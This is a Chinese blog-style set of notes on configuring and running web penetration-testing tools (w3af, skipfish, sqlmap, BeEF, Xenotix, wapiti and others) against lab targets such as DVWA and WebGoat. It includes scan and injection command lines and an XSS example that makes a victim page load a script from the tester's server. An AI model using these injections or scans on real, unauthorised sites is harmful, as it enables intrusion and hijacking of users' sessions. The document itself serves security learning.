前幾日,對常用的滲透測試工具摸了一把,主要是針對sql注入和XSS,抓了些包,現在把常用滲透測試工具使用時候的應該注意的東東記錄了下來,年紀大了,不寫容易忘~
歡迎大家指正~
常用滲透測試工具使用tips
---by yd0str
1. BT5 VM版本
在/pentest/web下面,常用penetration test工具
綜合測試攻擊
(1) w3af (抓了些包,看着效果不好)
(這個配置也非常的噁心,尤其是表單認證內容,拿DVWA做測試,web.spider爬取的內容有問題,全站爬取,不會從指定起始頁碼爬起)
下面是表單認證的具體步驟:
1 auth--detailed
username:admin
password:admin
method:POST
auth_url:http://192.168.184.141/dvwa/login.php
username_field:user (這兩個地方填錯了多次,因爲表單那個地方的name有幾處,還是有待進一步注意)
password_field:pass
check_url:http://192.168.184.141/dvwa/index.php
check_string:admin
data_format:username=%U&password=%P&Login=Login
這時候如果只選中auth這個認證,然後web.spider,會提示登陸是否正確
(https://www.owasp.org/index.php/Automated_Audit_using_W3AF
http://w3af.org/howtos/authenticated-scans
http://www.91ri.org/5782.html
http://www.91ri.org/3117.html)
(2) burpsuite(這個也有單獨版本,如果覺得BT下不好使,可以單獨使用)
本身不屬於滲透測試工具,但是可以結合別的工具使用,這裏抓了暴力破解用戶名密碼的包
(3)skipfish(名人所寫,但是據說效果不是很好)
下面這個是用skipfish掃描dvwa的過程,但是好像是全站爬取,量太大,就暫停了掃描,效果不好
./skipfish -o dvwa -C "security=high; PHPSESSID=taj2jhiqba3j0fs50pa7f1rb20" -S "dictionaries/complete.wl" -W "dictionaries/webgoat.wl" http://192.168.184.141/dvwa/vulnerabilities/
(4)zap(暫時沒有測試,國外黑客對這個也比較有興趣,也是常用的工具)
經典XSS攻擊平臺
(5)xsser(http://www.91ri.org/2740.html) 注入工具大都是針對有參數的URL
這個是針對帶有參數的,要看代碼
(6)beef (抓了包,從包上看是帶有beef指紋的,但是內容是加密的,具體的原理要看代碼才能知道了https://github.com/beefproject/beef)
BT5下的打不開,出錯
直接運行BT5下面的beef報錯如下:、
/root/beef/core/loader.rb:18:in `require': no such file to load -- bundler/setup (LoadError)
from /root/beef/core/loader.rb:18:in `<top (required)>'
from ./beef:42:in `require'
from ./beef:42:in `<main>'
上網找了一下,發現是環境變量的原因。
用如下方法再次安裝bundler
gem install -–user-install bundler
此時刻運行,還是會報一個錯,爲
root@bt:/pentest/web/beef# ./beef
Could not find gem 'eventmachine (= 0.12.10) ruby' in the gems available on this machine.
Run `bundle install` to install missing gems.
然後繼續運行:bundle install
然後在執行beef
(http://m.blog.csdn.net/blog/xihuanqiqi/17091067 攻略,很詳細,xsser.me for SAE)
(7)sqlmap(python腳本學習下)
經典sql注入工具
(這種針對參數的工具,不知道是不是掃描方式有問題,還是怎麼着,怎麼才能抓幾個包,或者把常用點的包抓出來)
抓幾個sqlmap的包
sqlmap功能很強大,這裏就抓了一個結合burpsuite POST sqlmap的包(也可以用Burpsuite sqlmap插件http://www.freebuf.com/tools/6426.html)
命令:
1. 先用burpsuite 攔截一個網站(包裏用的是wvs的測試網站http://testasp.vulnweb.com/Login.asp)的post請求,然後將這個請求存下來,比如保存爲burpsuite_sql_post.txt
2. sqlmap.py -r "burpsuite_sql_post.txt" -p tfUName(或者tfUPass)
綜合掃描系列
2. wvs (192.168.184.135)
WVS(Web Vulnerability Scanner)是一個自動化的Web應用程序安全測試工具,它可以掃描任何可通過Web瀏覽器訪問的和遵循
如果在windows下用wireshark抓包,記得用命令形式
如:tshark -D (找出網卡)
tshark -i 網卡號 -b filesize:10240(10M) -w "xxxxx.pcap" 以10M一個包保存,還有其他功能,比如根據時間,存幾個包,可以參考命令說明
這個包存了一大批(4,500)
3. nessus 4.x(5.x版本不好用) (192.168.184.135)
Nessus 開源漏洞掃描與分析軟件。
賬戶名密碼:xxxx,xxxxx
這個掃描需要登錄驗證的頁面,比較複雜,參考這個鏈接,但是效果不好
https://www.owasp.org/images/4/4f/Web_Application_Vul_Testing_with_Nessus_2012.02.01.pdf
抓出來3個包
從包中來看,應該是能登錄進去的,但是後面的鏈接爬取好像有問題,效果不太好
4. WebCruiserEnt (已經抓包,還有log 192.168.184.130)
Web安全掃描工具WebCruiser - Web Vulnerability Scanner
Web應用漏洞掃描器,能夠對整個網站進行漏洞掃描,並能夠對發現的漏洞(SQL注入,跨站腳本,XPath注入等)進行驗證;它也可以單獨進行漏洞驗證,作爲SQL注入工具、XPath注入工具、跨站檢測工具使用
5. appscan 不好配置,webgoat虛擬下容易被打掛,需要經常重啓,所以先抓了一個大概的包,payload信息應該是全的
配置的時候需要記得登錄驗證的地方(192.168.184.135)
http://public.dhe.ibm.com/software/dw/cn/demos/rIntroToAppScan/rIntroToAppScan.pdf
http://www.nxadmin.com/tools/675.html
http://www.360doc.com/content/11/0831/10/284310_144677089.shtml
6. safe3wvs 抓了一個,包的數量不多,掃webgoat有幾個漏洞(192.168.184.135)
這個掃描之前,需要注意輸入驗證用戶名密碼的輸入,還有cookie的輸入,這個地方用temper data 截取了cookie放在了這裏
才能掃出結果
SQL注入,XSS專業平臺
7. Xenotix XSS Exploit Framework V4 (已經抓包,需要寫個使用文檔,在宿主機本機上)
owasp出品,檢測和利用WEB應用程序中的XSS漏洞的滲透測試工具。這個工具可以將代碼注入到含有xss漏洞的web頁面中
注意事項:先配置服務端,就是一個本地的IP,比如4.5版本的會默認的127.0.0.1:5050
這個地方是爲了配置一個動態的腳本,該腳本在該框架中的用處我們下邊會進行介紹(youtube上有視頻)
1. 首先利用該框架,對victim(受害者)網站進行url的注入掃描,就是對參數進行攻擊串的掃描,如果哪個瀏覽器框架會體現出存在的XSS點,就會彈彈彈
這一部分其中是用不到開始配置的那個本地服務的js腳本的
2. 如果有個地方經過上面或者其他方式驗證,存在XSS點,那麼就可以插入本地這個配置的腳本了,比如
存在XSS點爲http://192.168.184.135/aa.php?id=1
如果這個id參數存在XSS威脅,那麼可以就是這麼插入
http://192.168.184.135/aa.php?id=1<script>127.0.0.1:5050/xss.js</script>
這樣就可以利用該框架的包括一些命令執行的功能了,相當於讓遠程victim網站加載了本地的JS腳本,進行語句執行
8. Havij (已經抓包,還有log 192.168.184.130)
Havij是一款自動化的SQL注入工具
(這種工具主要用來配合綜合掃描工具(比如經典的配合safe3wvs,然後在配合旁註工具,找到後臺,然後用該工具跑出的用戶名密碼進行登錄後臺),
或者對可疑注入點進行注入使用)
但是對dvwa的注入點進行掃描的時候,沒有找到注入點
9. wapiti (python腳本學習下)(已經抓包,還有log 192.168.184.130)
sql注入工具
工具3.x版本是個exe,看不到py,可以看看原始的python腳本
這是一個輕量級的web掃描工具,具說可以識別文件處理錯誤、SQL、LDAP 及 CRLF 類注入攻擊,跨站腳本攻擊、檢查潛在的命令執行。wapiti 是由 python 語言開發的,因此支持的平臺也很廣泛,安裝 python vm 是可以了
1.通過掃描dvwa來看,效果不好,
(1)(有登陸,首先進行獲取cookie值,該軟件自帶一個獲取cookie的工具,存成json形式,這個跟以前的版本不太一致)
C:\xxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti-getcookie.exe cookie.json http://192.168.184.141/dvwa/
(2)帶着cookie去掃描,-s的內容好像是可能起始頁,從包上來看,可以在該目錄下遍歷
C:\dd\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe "http://192.168.184.141/dvwa/" -c cookie.json -s "http://192.168.184.141/dvwa/vulnerabilities/"
(3)從攻擊包分析看,是對鏈接拼接了一些串,(http://lzy.iteye.com/blog/338178 說不像 nikto 提供測試用例庫,而是實現了內置的匹配算法)
但從包上看,大概是一些關鍵的字符串,具體的所謂的匹配算法還要去看py腳本內容
(4)如果輸入的url不帶參數,就是直接在url後拼接,如果帶參數輸入命令的話,可以在參數後進行跑
C:\dd\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe "http://192.168.184.141/dvwa/" -c cookie.json -s "http://192.168.184.141/dvwa/vulnerabilities/sqli/?id="
總體效果不好,沒有找到漏洞點,反而找到了一個login.php的 SQL 注入
掃描testfire效果好些還可以
C:\xxxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti-getcookie.exe cookie.json http://demo.testfire.net/bank/login.aspx
C:\xxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe http://demo.testfire.net/ -c cookie.json -x http://demo.testfire.net/bank/logout.aspx
10. pangolin(沒測)
穿山甲,注入攻擊